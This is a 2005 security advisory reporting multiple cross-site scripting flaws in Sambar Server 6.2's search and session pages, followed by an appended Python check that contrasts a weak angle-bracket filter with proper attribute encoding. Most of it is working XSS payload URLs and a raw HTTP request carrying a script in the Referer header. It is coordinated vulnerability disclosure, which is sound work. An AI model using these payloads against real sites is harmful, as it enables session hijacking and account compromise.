Message-ID: <20050523210229.68980.qmail@web25001.mail.ukl.yahoo.com>
Date: Mon May 23 22:02:35 2005
From: contact_jamie_fisher at yahoo.co.uk (jamie fisher)
Subject: XSS in Sambar Server version 6.2


                     - Sambar - 
AFFECTED PRODUCTS:
================== 
Sambar Server 6.2 
http://www.sambar.com/ 

OVERVIEW: 
=========
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC, Syslog, Proxy and FTP server.

HISTORY:
========
17th April 2005 - First discovered
17th April 2005 - Contacted vendor
20th April 2005 - Vendor reply
20th May 2005 - Patch available

DETAILS:
========
Multiple XSS found in the administrative interface.
In some instances Sambar Server version 6.2 does not correctly filter HTML code from user-supplied input. A user can input a specially crafted script that, when rendered by the application, will cause arbitrary scripting to be executed by the user's browser. The code will originate from the site running the Sambar Server version 6.2 software and will run in the security context of that site.

ISSUE:
======
Crafted input causes the application to output what is known as a Cross Site Script. The script is rendered upon visitation to the affected page served by the application.

EXAMPLE:
========
Standard XSS within the /search directory:
==========================================
1.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
2.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
3.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
7.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
8.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
9.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
10.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
11.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
12.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name

Standard XSS within the /session directory:
===========================================
1.
http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
2.
http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
3.
http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>

HTML XSS within the /search directory:
======================================
1.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name

No chevron '<' '>' XSS within the /search directory:
====================================================
1.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name

Escaping from HTML XSS within the /session directory:
====================================================
1.
http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>

Including XSS within referrer:
==============================
1.
GET /CheckingXssInReferer.html HTTP/1.0
Cookie: RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=; RCslb=5; RCrelogin=false
Host: 192.168.0.5
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Referer: "></a><script>alert('XSS')</script>

SOLUTION: 
=========
Sambar Server has been contacted and has released patches. 
Note: There were probably a lot more input validation errors but due to a whining girlfriend work had to be cut short :)

REFERENCE:
==========
http://www.sambar.com/security.htm
http://homepage.hispeed.ch/spamtrap/sambar62p.exe

CREDITS: 
========
Tod Sambar for understanding the issue and resolving in a timely manner.
 
This vulnerability was discovered and researched by Jamie Fisher
mail: contact_jamie_fisher[at]yahoo.co.uk
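
Added example, not part of the original advisory or of Sambar's code: a regression check showing why the "No chevron" variant defeats a filter that only removes '<' and '>', while entity-encoding quotes keeps the reflected indexname value inside its attribute. The template and the function names are assumptions; the advisory does not show Sambar's actual markup.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed template: the real results.stm markup is not in the advisory.
TEMPLATE = '<input type="text" name="indexname" value="{}">'

# indexname values as they appear in the advisory's URLs.
PAYLOADS = {
    "script tag": '>"><script>alert("XSS")</script>',
    "no chevron": "%22%20style%3D%22background:url(javascript:alert(%27XSS%27))"
                  "%22%20OA%3D%22",
}

def strip_chevrons(value):
    """Weak filter: removes only '<' and '>' and leaves quotes alone."""
    return value.replace("<", "").replace(">", "")

def escape_attr(value):
    """Entity-encode &, <, >, double quotes and single quotes."""
    return html.escape(value, quote=True)

class _Shape(HTMLParser):
    """Records each start tag with its sorted attribute names."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, sorted(name for name, _ in attrs)))

EXPECTED = [("input", ["name", "type", "value"])]

def rendered_shape(encoder, raw_param):
    """Decode the parameter, encode it, render it, and parse the result."""
    parser = _Shape()
    parser.feed(TEMPLATE.format(encoder(unquote(raw_param))))
    parser.close()
    return parser.tags

def markup_intact(encoder, raw_param):
    """True if the reflected value added no tag and no attribute."""
    return rendered_shape(encoder, raw_param) == EXPECTED

if __name__ == "__main__":
    for name, raw in PAYLOADS.items():
        for enc in (strip_chevrons, escape_attr):
            state = "intact" if markup_intact(enc, raw) else "INJECTED"
            print(f"{name:10} {enc.__name__:15} {state}")
```

The same check can be pointed at other reflection contexts (HTML comment, Referer echo) by swapping TEMPLATE, since each context needs its own encoding rule.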

		